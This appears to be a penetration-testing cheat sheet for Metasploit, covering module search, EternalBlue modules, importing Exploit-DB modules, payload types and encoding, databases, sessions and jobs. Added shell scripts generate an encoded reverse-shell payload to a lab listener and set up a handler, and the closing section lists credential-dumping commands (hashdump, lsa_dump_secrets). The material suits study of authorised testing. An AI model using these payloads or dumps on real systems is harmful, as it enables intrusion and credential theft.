Metasploit
yup, this whole page is just for it :3
msfconsole
to start it
search <term>
Searches module names and descriptions for the term (search type:exploit <term> limits it to exploits; more filters under Search below)
use <exploit_path>
Selects the module to use (or use <number> with the index from the last search)
show options
Shows the selected exploit's options
set <variable> <value>
Sets an option's value (setg sets it globally, so it carries over to the next module you load)
check
Runs the module's check method to see whether the target is vulnerable without exploiting it (only modules that implement check support this)
exploit
Runs the exploit (run does the same)
Useful exploits
multi/handler
catches shells from msfvenom payloads (set the same PAYLOAD, LHOST and LPORT the binary was built with)
windows/smb/ms17_010_psexec
MS17-010 (EternalBlue family; the kernel-pool variant is windows/smb/ms17_010_eternalblue). Scan first with auxiliary/scanner/smb/smb_ms17_010
post/multi/recon/local_exploit_suggester
after a successful shell, suggests local privilege escalation exploits that match the target
post/multi/manage/shell_to_meterpreter
upgrades a plain shell session to meterpreter
Adding exploits to msfconsole
For example, find the module with searchsploit:
searchsploit Lightweight Facebook-styled blog 1.3
the exploit has a Metasploit module, but it is not shipped with the framework, so we have to import it ourselves
cd /usr/share/metasploit-framework/modules/exploits
# the file has to sit under the path you want to "use" it as, e.g. php/webapps/
mkdir -p php/webapps && cd php/webapps
# searchsploit -m copies (mirrors) the file into the current directory
searchsploit -m php/webapps/50064.rb
# load the module tree when starting msfconsole
msfconsole -m /usr/share/metasploit-framework/modules/
# OR from inside metasploit
msf6> loadpath /usr/share/metasploit-framework/modules/
# OR
msf6> reload_all
Metasploit also loads modules from the per-user tree ~/.msf4/modules/ (same subfolder layout as /usr/share/metasploit-framework/modules/), so a module can be dropped there without sudo and is not touched by package updates of the framework; reload_all picks it up.
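The import above done the way it is usually done in practice, as an added example that is not code from the original page: a POSIX shell function that installs a downloaded module into the per-user ~/.msf4/modules tree, checks that the file really is a framework module before it can break reload_all, and enforces that the path starts with a module type directory. The module name lightweight_blog_rce.rb is an assumed name for the Exploit-DB file, chosen for this example.

```shell
# install_msf_module SOURCE.rb TYPE/RELATIVE/PATH.rb
# Copies a module into the per-user tree; the relative path becomes the name
# you "use" it as (exploits/php/webapps/foo.rb -> use exploit/php/webapps/foo).
# Prints the installed path; returns 1 if the file is not a framework module
# or the path does not start with a module type directory.
install_msf_module() {
  src="$1"; rel="$2"
  dest="${HOME}/.msf4/modules/${rel}"
  # every framework module defines one of these classes; anything else only
  # produces load errors on reload_all
  if ! grep -qE 'class (MetasploitModule|Metasploit[0-9])' "$src"; then
    printf 'not a Metasploit module: %s\n' "$src" >&2
    return 1
  fi
  # msfconsole only looks in these type directories
  case "$rel" in
    exploits/*|auxiliary/*|post/*|payloads/*|encoders/*|nops/*|evasion/*) ;;
    *) printf 'path must start with a module type (exploits/, auxiliary/, ...)\n' >&2; return 1 ;;
  esac
  mkdir -p "$(dirname "$dest")"
  cp "$src" "$dest"
  printf '%s\n' "$dest"
}

# Example (Exploit-DB entry 50064 from the searchsploit result above; the
# target file name is an assumption made for this example):
#   searchsploit -m php/webapps/50064.rb
#   install_msf_module ./50064.rb exploits/php/webapps/lightweight_blog_rce.rb
# then in msfconsole:  reload_all
#                      use exploit/php/webapps/lightweight_blog_rce
```

The per-user tree is preferable to copying into /usr/share: no sudo, and a package update of metasploit-framework cannot overwrite your module.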
To write a custom module, everything needed about Metasploit's Ruby API is on the Rubydoc.info page for the Metasploit Framework.
Search
help search
search type:exploit platform:windows cve:2021 rank:excellent microsoft
GREP
grep meterpreter show payloads
grep meterpreter grep reverse_tcp show payloads
Payload Types
The table below contains the most common payloads used for Windows machines and their respective descriptions. Naming convention: an underscore (shell_reverse_tcp) is a single, stageless payload; a slash (shell/reverse_tcp) is a small stager that fetches the larger stage from the handler. The handler must be set to exactly the same payload string as the binary was built with.
Payload                            Description
generic/custom                     Generic listener, multi-use
generic/shell_bind_tcp             Generic listener, multi-use, normal shell, TCP bind
generic/shell_reverse_tcp          Generic listener, multi-use, normal shell, reverse TCP connection
windows/x64/exec                   Executes an arbitrary command (Windows x64)
windows/x64/loadlibrary            Loads an arbitrary x64 library path
windows/x64/messagebox             Spawns a dialog via MessageBox with a customizable title, text and icon
windows/x64/shell_reverse_tcp      Normal shell, single (stageless) payload, reverse TCP connection
windows/x64/shell/reverse_tcp      Normal shell, stager + stage, reverse TCP connection
windows/x64/shell/bind_ipv6_tcp    Normal shell, stager + stage, IPv6 bind TCP stager
windows/x64/meterpreter/$          Meterpreter payload + the stager varieties above
windows/x64/powershell/$           Interactive PowerShell session + the varieties above
windows/x64/vncinject/$            VNC server (reflective injection) + the varieties above
Encoders
Shikata Ga Nai (SGN) is the most widely used Metasploit encoder. Its polymorphic output (a randomised XOR additive-feedback decoder in front of the payload) was hard to signature for years, which is where its reputation comes from; today a payload encoded with it is far from undetectable. The name (仕方がない) means "It cannot be helped" or "Nothing can be done about it", which was fair enough a few years ago. Keep in mind what encoders are for: removing bad characters from a payload, not evading antivirus; for evasion there are other methods to explore. The FireEye article on Shikata Ga Nai explains why and how it outperformed the other encoders for so long.
Flags to add encoding in msfvenom:
-b "\x00" -e x86/shikata_ga_nai
-b lists the bad bytes the encoder must avoid, -e picks the encoder
In msfconsole:
show encoders
An executable payload encoded only once with SGN is flagged by most antivirus engines today. Iterating the encoder re-encodes the output several times, each pass with a fresh key and decoder stub; that changes the bytes but rarely the verdict:
-i 10
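The msfvenom call with those flags, followed by the check a practitioner wants after encoding, as an added example (POSIX shell, not code from the page): a single stray bad byte (a NUL in a strcpy-style overflow, a newline in a line-oriented protocol) truncates the shellcode, so verify the output actually avoids the bytes you listed. The host, port, payload and bad-byte list are placeholders for your own target; find_badchars runs offline on any file.

```shell
# find_badchars FILE "00 0a 0d"
# Prints each listed byte (lowercase two-digit hex) that occurs in FILE, one per
# line. Returns 1 if any was found, 0 if the blob is clean.
find_badchars() {
  file="$1"; bad="$2"; found=0
  # one byte per line as two hex digits; od -t x1 is lowercase on GNU and BSD
  hexdump=$(od -A n -v -t x1 "$file" | tr ' ' '\n' | grep . || true)
  for b in $bad; do
    if printf '%s\n' "$hexdump" | grep -qxF "$b"; then
      printf '%s\n' "$b"
      found=1
    fi
  done
  return $found
}

# encode_payload LHOST LPORT OUTFILE "00 0a 0d"
# Builds a raw, SGN-encoded reverse shell (five iterations) and then checks the
# result against the same bad-byte list that was handed to msfvenom.
encode_payload() {
  # "00 0a 0d" -> '\x00\x0a\x0d', the form msfvenom -b expects
  badopt=$(printf '%s' "$4" | sed 's/\([0-9a-f][0-9a-f]\)/\\x\1/g; s/ //g')
  msfvenom -p windows/shell_reverse_tcp LHOST="$1" LPORT="$2" \
    -e x86/shikata_ga_nai -i 5 -b "$badopt" -f raw -o "$3" \
  && find_badchars "$3" "$4"
}

# Lab values (placeholders):
#   encode_payload 10.10.14.5 4444 shell.bin "00 0a 0d" && echo "clean"
```

If find_badchars prints anything, the encoder could not satisfy the constraint (or a different encoder got picked); choose another encoder with -e rather than trusting the file.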
Databases
Metasploit supports PostgreSQL by default.
Check status:
sudo msfdb status
Configure if not already present:
sudo service postgresql status
sudo systemctl start postgresql
sudo msfdb init
Workspaces
workspace -a Target_1
workspace Target_1
workspace
workspace -h
Importing nmap scans
You can import XML (preferably) nmap outputs:
db_import Target.xml
Or scan directly from inside msfconsole:
db_nmap -sV -sS 10.10.10.8
See saved target hosts:
hosts
See discovered services:
services
Save Found Credentials
creds -h
Backup data
After finishing a session, back up the data in case anything happens to the PostgreSQL service. To do so, use the db_export command:
db_export -f xml backup.xml
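The database workflow above (workspace, import, hosts, services, export) as one non-interactive run, added here as an example rather than taken from the page: msfconsole -x takes a semicolon-separated command chain, which is handy for importing a scan into its own workspace and exporting a backup without typing into the console. It needs a running PostgreSQL (sudo msfdb init once); the workspace and file names are placeholders.

```shell
# nmap_xml_ok FILE
# Accept only nmap XML output; feeding db_import a -oN/-oG file is the usual mistake.
nmap_xml_ok() {
  [ -r "$1" ] && grep -q '<nmaprun' "$1"
}

# msf_db_cmds WORKSPACE SCAN.xml BACKUP.xml
# The console command chain in the form msfconsole -x expects.
# "workspace -a" creates the workspace; the second "workspace" switches to it
# even when it already existed.
msf_db_cmds() {
  printf 'workspace -a %s; workspace %s; db_import %s; hosts; services; db_export -f xml %s; exit' \
    "$1" "$1" "$2" "$3"
}

# import_scan WORKSPACE SCAN.xml BACKUP.xml
import_scan() {
  nmap_xml_ok "$2" || { printf '%s is not nmap XML (scan with nmap -oX)\n' "$2" >&2; return 1; }
  msfconsole -q -x "$(msf_db_cmds "$1" "$2" "$3")"
}

# Placeholders:
#   nmap -sV -sS -oX Target.xml 10.10.10.8
#   import_scan Target_1 Target.xml backup.xml
```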
Loot
The loot command works alongside the database to give an at-a-glance list of owned services and users. Loot here means hash dumps from different system types: hashes, passwd, shadow and more.
loot -h
Plugins
Listed in /usr/share/metasploit-framework/plugins
Loading plugins (example with nessus):
load nessus
nessus_help
Installing new plugins
git clone https://github.com/darkoperator/Metasploit-Plugins
sudo cp ./Metasploit-Plugins/pentest.rb /usr/share/metasploit-framework/plugins/pentest.rb
Afterward, launch msfconsole and check the installation by running load pentest. Once the plugin is loaded, the help menu of msfconsole is automatically extended with the plugin's commands.
Some plugins
Many people write plugins for the Metasploit framework. Each has a specific purpose and can save a lot of time once you are familiar with it.
Sessions
To drop out of the current meterpreter (or other) session back to the console while leaving the session open, use:
background
List with:
sessions
Switch to session ID with:
sessions -i <Number>
post modules generally need the session they should run against: set SESSION <Number> in their options
Jobs
If, for example, we are running an active exploit as a job on a specific port and need that port for a different module, we cannot simply terminate the session with [CTRL] + [C]: the listener keeps the port bound and the new module fails to start. Instead, use the jobs command to look at the tasks running in the background and terminate the old one to free up the port.
jobs -h
Any exploit can be started as a job with exploit -j. Per the help menu of the exploit command, adding -j instead of a plain exploit or run will "run it in the context of a job", so the console stays usable while the module waits for a connection.
exploit -h
Listing running jobs:
jobs -l
jobs -K kills all running jobs; jobs -k <id> (or kill <id>) kills a specific one.
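The handler run as a job, as an added example that is not from the original page, ties together multi/handler from the Useful exploits list, the shell_to_meterpreter upgrade, and the exploit -j and jobs handling described here. It is a POSIX shell script that writes the msfconsole resource script and documents the matching msfvenom command; the IP, port, payload and file names are lab placeholders.

```shell
# write_handler_rc LHOST LPORT PAYLOAD OUTFILE
# Writes a resource script that starts multi/handler as a background job and
# prints the script's path. Run it with: msfconsole -q -r OUTFILE
write_handler_rc() {
  lhost="$1"; lport="$2"; payload="$3"; out="$4"
  {
    printf 'use exploit/multi/handler\n'
    printf 'set PAYLOAD %s\n' "$payload"
    printf 'set LHOST %s\n' "$lhost"
    printf 'set LPORT %s\n' "$lport"
    # keep listening after the first session instead of ending the job
    printf 'set ExitOnSession false\n'
    # a plain shell payload gets upgraded on arrival; a meterpreter payload
    # needs no upgrade and the post module would just fail on it
    case "$payload" in
      *meterpreter*) ;;
      *) printf 'set AutoRunScript post/multi/manage/shell_to_meterpreter\n' ;;
    esac
    # -j: run as a job so the console stays free; -z: do not auto-interact
    printf 'exploit -j -z\n'
  } > "$out"
  printf '%s\n' "$out"
}

# gen_payload LHOST LPORT PAYLOAD OUTFILE
# The msfvenom side; the payload string must match the handler exactly.
gen_payload() {
  msfvenom -p "$3" LHOST="$1" LPORT="$2" -f exe -o "$4"
}

# Lab values (placeholders):
#   rc=$(write_handler_rc 10.10.14.5 4444 windows/x64/shell_reverse_tcp handler.rc)
#   gen_payload 10.10.14.5 4444 windows/x64/shell_reverse_tcp shell.exe
#   msfconsole -q -r "$rc"
# Once it is running:  jobs -l        lists the handler job
#                      sessions -i 1  attaches to the caught (upgraded) session
#                      jobs -k 0      frees the port when you are done
```

Because ExitOnSession is false, the job keeps the port until you kill it; that is exactly the situation the Jobs section describes, so free it with jobs -k before starting another module on the same port.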
Useful meterpreter commands
hashdump
dumps the local SAM hashes (needs SYSTEM; migrate into a SYSTEM process first if it fails)
load kiwi
loads the Mimikatz extension that provides the next two (also needs SYSTEM, and a meterpreter matching the host architecture)
lsa_dump_sam
lsa_dump_secrets